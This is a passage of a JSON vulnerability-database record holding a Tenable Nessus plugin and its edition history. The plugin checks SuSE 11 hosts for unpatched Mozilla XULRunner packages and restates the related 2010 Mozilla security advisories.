reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "SuSE 11 / 11.1 Security Update : Mozilla XULrunner (SAT Patch Numbers 3557 / 3558)", "type": "nessus", "viewCount": 3}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:24:10"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-32bit", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-gnomevfs-32bit", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-translations-32bit", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-translations", "p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-gnomevfs"], "cvelist": ["CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3180", "CVE-2010-3179", "CVE-2010-3175", "CVE-2010-3182", "CVE-2010-3170", "CVE-2010-3183"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "This update brings the Mozilla XULRunner engine to version 1.9.1.15, fixing various bugs and security issues.\n\nThe following security issues were fixed :\n\n - Mozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these bugs showed evidence of memory corruption under certain circumstances, and we presume that with enough effort at least some of these could be exploited to run arbitrary code. References. (MFSA 2010-64)\n\n Paul Nickerson, Jesse Ruderman, Olli Pettay, Igor Bukanov and Josh Soref reported memory safety problems that affected Firefox 3.6 and Firefox 3.5.\n\n - Memory safety bugs - Firefox 3.6, Firefox 3.5\n\n - Gary Kwong, Martijn Wargers and Siddharth Agarwal reported memory safety problems that affected Firefox 3.6 only. (CVE-2010-3176)\n\n - Memory safety bugs - Firefox 3.6\n\n - CVE-2010-3175\n\n - Security researcher Alexander Miller reported that passing an excessively long string to document.write could cause text rendering routines to end up in an inconsistent state with sections of stack memory being overwritten with the string data. An attacker could use this flaw to crash a victim's browser and potentially run arbitrary code on their computer. (MFSA 2010-65 / CVE-2010-3179)\n\n - Security researcher Sergey Glazunov reported that it was possible to access the locationbar property of a window object after it had been closed. Since the closed window's memory could have been subsequently reused by the system it was possible that an attempt to access the locationbar property could result in the execution of attacker-controlled memory. (MFSA 2010-66 / CVE-2010-3180)\n\n - Security researcher regenrecht reported via TippingPoint's Zero Day Initiative that when window.__lookupGetter__ is called with no arguments the code assumes the top JavaScript stack value is a property name. Since there were no arguments passed into the function, the top value could represent uninitialized memory or a pointer to a previously freed JavaScript object. Under such circumstances the value is passed to another subroutine which calls through the dangling pointer, potentially executing attacker-controlled memory. (MFSA 2010-67 / CVE-2010-3183)\n\n - Google security researcher Robert Swiecki reported that functions used by the Gopher parser to convert text to HTML tags could be exploited to turn text into executable JavaScript. If an attacker could create a file or directory on a Gopher server with the encoded script as part of its name the script would then run in a victim's browser within the context of the site. (MFSA 2010-68 / CVE-2010-3177)\n\n - Security researcher Eduardo Vela Nava reported that if a web page opened a new window and used a javascript: URL to make a modal call, such as alert(), then subsequently navigated the page to a different domain, once the modal call returned the opener of the window could get access to objects in the navigated window. This is a violation of the same-origin policy and could be used by an attacker to steal information from another web site.\n (MFSA 2010-69 / CVE-2010-3178)\n\n - Security researcher Richard Moore reported that when an SSL certificate was created with a common name containing a wildcard followed by a partial IP address a valid SSL connection could be established with a server whose IP address matched the wildcard range by browsing directly to the IP address. It is extremely unlikely that such a certificate would be issued by a Certificate Authority. (MFSA 2010-70 / CVE-2010-3170)\n\n - Dmitri Gribenko reported that the script used to launch Mozilla applications on Linux was effectively including the current working directory in the LD_LIBRARY_PATH environment variable. If an attacker was able to place into the current working directory a malicious shared library with the same name as a library that the bootstrapping script depends on the attacker could have their library loaded instead of the legitimate library.\n (MFSA 2010-71 / CVE-2010-3182)\n\n - Morten Kråkvik of Telenor SOC reported an exploit targeting particular versions of Firefox 3.6 on Windows XP that Telenor found while investigating an intrusion attempt on a customer network. The underlying vulnerability, however, was present on both the Firefox 3.5 and Firefox 3.6 development branches and affected all supported platforms. (MFSA 2010-73 / CVE-2010-3765)", "edition": 3, "enchantments": {"score": {"value": 10.0, "vector": "NONE"}}, "hash": "5ecbd8c0c35cb3aa143223387c41fa7b679455bf55a49c60930e2d0628a0f993", "hashmap": [{"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "c9be8c76b09668e68564aafc37499eff", "key": "references"}, {"hash": "a8e55707958b4a0e640ad83a3e69d853", "key": "cpe"}, {"hash": "65fe2a93d43070603e05e87f85db8f43", "key": "title"}, {"hash": "96ffa3e5f217475f603a12d5cccf94fe", "key": "href"}, {"hash": "0d10e29d75af6551e75c87d10169a1d2", "key": "pluginID"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "d14d1a96b91092c41434a96e62b67fa1", "key": "published"}, {"hash": "16dfb1899bc96767b30ee77a130bcfbb", "key": "description"}, {"hash": "5b6f3fc076a2d9c6f98e81620afdb872", "key": "modified"}, {"hash": "0b19968aa0d749fbb88c80abb37d3520", "key": "cvelist"}, {"hash": "350fe642a6bd00b9726ef9b638f591f0", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=50952", "id": "SUSE_11_MOZILLA-XULRUNNER191-101118.NASL", "lastseen": "2018-08-30T19:36:38", "modified": "2013-11-27T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "50952", "published": "2010-12-02T00:00:00", "references": ["http://www.mozilla.org/security/announce/2010/mfsa2010-67.html", "http://support.novell.com/security/cve/CVE-2010-3179.html", "http://support.novell.com/security/cve/CVE-2010-3178.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-73.html", "http://support.novell.com/security/cve/CVE-2010-3180.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-68.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-66.html", "http://support.novell.com/security/cve/CVE-2010-3183.html", "http://support.novell.com/security/cve/CVE-2010-3170.html", "http://support.novell.com/security/cve/CVE-2010-3175.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-64.html", "http://support.novell.com/security/cve/CVE-2010-3765.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-69.html", "http://support.novell.com/security/cve/CVE-2010-3177.html", "http://support.novell.com/security/cve/CVE-2010-3182.html", "http://support.novell.com/security/cve/CVE-2010-3176.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-65.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-70.html", "http://www.mozilla.org/security/announce/2010/mfsa2010-71.html", "https://bugzilla.novell.com/show_bug.cgi?id=653606"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50952);\n script_version(\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2013/11/27 17:11:05 $\");\n\n script_cve_id(\"CVE-2010-3170\", \"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\", \"CVE-2010-3765\");\n\n script_name(english:\"SuSE 11 / 11.1 Security Update : Mozilla XULrunner (SAT Patch Numbers 3557 / 3558)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update brings the Mozilla XULRunner engine to version 1.9.1.15,\nfixing various bugs and security issues.\n\nThe following security issues were fixed :\n\n - Mozilla developers identified and fixed several memory\n safety bugs in the browser engine used in Firefox and\n other Mozilla-based products. Some of these bugs showed\n evidence of memory corruption under certain\n circumstances, and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code. References. (MFSA 2010-64)\n\n Paul Nickerson, Jesse Ruderman, Olli Pettay, Igor\n Bukanov and Josh Soref reported memory safety problems\n that affected Firefox 3.6 and Firefox 3.5.\n\n - Memory safety bugs - Firefox 3.6, Firefox 3.5\n\n - Gary Kwong, Martijn Wargers and Siddharth Agarwal\n reported memory safety problems that affected Firefox\n 3.6 only. (CVE-2010-3176)\n\n - Memory safety bugs - Firefox 3.6\n\n - CVE-2010-3175\n\n - Security researcher Alexander Miller reported that\n passing an excessively long string to document.write\n could cause text rendering routines to end up in an\n inconsistent state with sections of stack memory being\n overwritten with the string data. An attacker could use\n this flaw to crash a victim's browser and potentially\n run arbitrary code on their computer. (MFSA 2010-65 /\n CVE-2010-3179)\n\n - Security researcher Sergey Glazunov reported that it was\n possible to access the locationbar property of a window\n object after it had been closed. Since the closed\n window's memory could have been subsequently reused by\n the system it was possible that an attempt to access the\n locationbar property could result in the execution of\n attacker-controlled memory. (MFSA 2010-66 /\n CVE-2010-3180)\n\n - Security researcher regenrecht reported via\n TippingPoint's Zero Day Initiative that when\n window.__lookupGetter__ is called with no arguments the\n code assumes the top JavaScript stack value is a\n property name. Since there were no arguments passed into\n the function, the top value could represent\n uninitialized memory or a pointer to a previously freed\n JavaScript object. Under such circumstances the value is\n passed to another subroutine which calls through the\n dangling pointer, potentially executing\n attacker-controlled memory. (MFSA 2010-67 /\n CVE-2010-3183)\n\n - Google security researcher Robert Swiecki reported that\n functions used by the Gopher parser to convert text to\n HTML tags could be exploited to turn text into\n executable JavaScript. If an attacker could create a\n file or directory on a Gopher server with the encoded\n script as part of its name the script would then run in\n a victim's browser within the context of the site. (MFSA\n 2010-68 / CVE-2010-3177)\n\n - Security researcher Eduardo Vela Nava reported that if a\n web page opened a new window and used a javascript: URL\n to make a modal call, such as alert(), then subsequently\n navigated the page to a different domain, once the modal\n call returned the opener of the window could get access\n to objects in the navigated window. This is a violation\n of the same-origin policy and could be used by an\n attacker to steal information from another web site.\n (MFSA 2010-69 / CVE-2010-3178)\n\n - Security researcher Richard Moore reported that when an\n SSL certificate was created with a common name\n containing a wildcard followed by a partial IP address a\n valid SSL connection could be established with a server\n whose IP address matched the wildcard range by browsing\n directly to the IP address. It is extremely unlikely\n that such a certificate would be issued by a Certificate\n Authority. (MFSA 2010-70 / CVE-2010-3170)\n\n - Dmitri Gribenko reported that the script used to launch\n Mozilla applications on Linux was effectively including\n the current working directory in the LD_LIBRARY_PATH\n environment variable. If an attacker was able to place\n into the current working directory a malicious shared\n library with the same name as a library that the\n bootstrapping script depends on the attacker could have\n their library loaded instead of the legitimate library.\n (MFSA 2010-71 / CVE-2010-3182)\n\n - Morten Kråkvik of Telenor SOC reported an\n exploit targeting particular versions of Firefox 3.6 on\n Windows XP that Telenor found while investigating an\n intrusion attempt on a customer network. The underlying\n vulnerability, however, was present on both the Firefox\n 3.5 and Firefox 3.6 development branches and affected\n all supported platforms. (MFSA 2010-73 / CVE-2010-3765)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-64.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-65.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-66.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-67.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-68.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-69.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-70.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-71.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2010/mfsa2010-73.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=653606\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3170.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3175.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3176.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3177.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3178.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3179.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3180.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3182.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3183.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-3765.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 3557 / 3558 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Firefox Interleaved document.write/appendChild Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-gnomevfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-gnomevfs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-xulrunner191-translations-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2013 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-gnomevfs-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-translations-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"mozilla-xulrunner191-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"mozilla-xulrunner191-gnomevfs-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"mozilla-xulrunner191-translations-1.9.1.15-0.5.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"mozilla-xulrunner191-32bit-1.9.1.15-0.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "SuSE 11 / 11.1 Security Update : Mozilla XULrunner (SAT Patch Numbers 3557 / 3558)", "type": "nessus", "viewCount": 4}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T19:36:38"}], "edition": 4, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "a8e55707958b4a0e640ad83a3e69d853"}, {"key": "cvelist", "hash": "0b19968aa0d749fbb88c80abb37d3520"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "description", "hash": "16dfb1899bc96767b30ee77a130bcfbb"}, {"key": "href", "hash": "96ffa3e5f217475f603a12d5cccf94fe"}, {"key": "modified", "hash": "5b6f3fc076a2d9c6f98e81620afdb872"}, {"key": "naslFamily", "hash": "71a40666da62ba38d22539c8277870c7"}, {"key": "pluginID", "hash": "0d10e29d75af6551e75c87d10169a1d2"}, {"key": "published", "hash": "d14d1a96b91092c41434a96e62b67fa1"}, {"key": "references", "hash": "c9be8c76b09668e68564aafc37499eff"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "350fe642a6bd00b9726ef9b638f591f0"}, {"key": "title", "hash": "65fe2a93d43070603e05e87f85db8f43"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "d17e8137ecf03951529888f90853932a3c71f95e6b10ab730c48e924d4cd382f", "viewCount": 4, "enchantments": {"score": {"value": 10.0, "vector": "NONE"}, "vulnersScore": 10.0}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50952);\n script_version(\"$Revision: 1.14 $\");\n script_cvs_date(\"$Date: 2013/11/27 17:11:05 $\");\n\n script_cve_id(\"CVE-2010-3170\", \"CVE-2010-3175\", \"CVE-2010-3176\", \"CVE-2010-3177\", \"CVE-2010-3178\", \"CVE-2010-3179\", \"CVE-2010-3180\", \"CVE-2010-3182\", \"CVE-2010-3183\", \"CVE-2010-3765\");\n\n script_name(english:\"SuSE 11 / 11.1 Security Update : Mozilla XULrunner (SAT Patch Numbers 3557 / 3558)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update brings the Mozilla XULRunner engine to version 1.9.1.15,\nfixing various bugs and security issues.\n\nThe following security issues were fixed :\n\n - Mozilla developers identified and fixed several memory\n safety bugs in the browser engine used in Firefox and\n other Mozilla-based products. Some of these bugs showed\n evidence of memory corruption under certain\n circumstances, and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code. References. (MFSA 2010-64)\n\n Paul Nickerson, Jesse Ruderman, Olli Pettay, Igor\n Bukanov and Josh Soref reported memory safety problems\n that affected Firefox 3.6 and Firefox 3.5.\n\n - Memory safety bugs - Firefox 3.6, Firefox 3.5\n\n - Gary Kwong, Martijn Wargers and Siddharth Agarwal\n reported memory safety problems that affected Firefox\n 3.6 only. (CVE-2010-3176)\n\n - Memory safety bugs - Firefox 3.6\n\n - CVE-2010-3175\n\n - Security researcher Alexander Miller reported that\n passing an excessively long string to document.write\n could cause text rendering routines to end up in an\n inconsistent state with sections of stack memory being\n overwritten with the string data. An attacker could use\n this flaw to crash a victim's browser and potentially\n run arbitrary code on their computer. (MFSA 2010-65 /\n CVE-2010-3179)\n\n - Security researcher Sergey Glazunov reported that it was\n possible to access the locationbar property of a window\n object after it had been closed. Since the closed\n window's memory could have been subsequently reused by\n the system it was possible that an attempt to access the\n locationbar property could result in the execution of\n attacker-controlled memory. (MFSA 2010-66 /\n CVE-2010-3180)\n\n - Security researcher regenrecht reported via\n TippingPoint's Zero Day Initiative that when\n window.__lookupGetter__ is called with no arguments the\n code assumes the top JavaScript stack value is a\n property name. Since there were no arguments passed into\n the function, the top value could represent\n uninitialized memory or a pointer to a previously freed\n JavaScript object. Under such circumstances the value is\n passed to another subroutine which calls through the\n dangling pointer, potentially executing\n attacker-controlled memory. (MFSA 2010-67 /\n CVE-2010-3183)\n\n - Google security researcher Robert Swiecki reported that\n functions used by the Gopher parser to convert text to\n HTML tags could be exploited to turn text into\n executable JavaScript. If an attacker could create a\n file or directory on a Gopher server with the encoded\n script as part of its name the script would then run in\n a victim's browser within the context of the site. (MFSA\n 2010-68 / CVE-2010-3177)\n\n - Security researcher Eduardo Vela Nava reported that if a\n web page opened a new window and used a javascript: URL\n to make a modal call, such as alert(), then subsequently\n navigated the page to a different domain, once the modal\n call returned the opener of the window could get access\n to objects in the navigated window. This is a violation\n of the same-origin policy and could be used by an\n attacker to steal information from another web site.\n (MFSA 2010-69 / CVE-2010-3178)\n\n - Security researcher Richard Moore reported that when an\n SSL certificate was created with a common name\n containing a wildcard followed by a partial IP address a\n valid SSL connection could be established with a server\n whose IP address matched the wildcard range by browsing\n directly to the IP address. It is extremely unlikely\n that such a certificate would be issued by a Certificate\n Authority. (MFSA 2010-70 / CVE-2010-3170)\n\n - Dmitri Gribenko reported that the script used to launch\n Mozilla applications on Linux was effectively including\n the current working directory in the LD_LIBRARY_PATH\n environment variable. If an attacker was able to place\n into the current working directory a malicious shared\n library with the same name as a library that the\n bootstrapping script depends on the attacker could have\n their library loaded instead of the legitimate library.\n (MFSA 2010-71 / CVE-2010-3182)\n\n - Morten Kråkvik of Telenor SOC reported an\n exploit targeting particular versions of Firefox 3.6 on\n Windows XP that Telenor 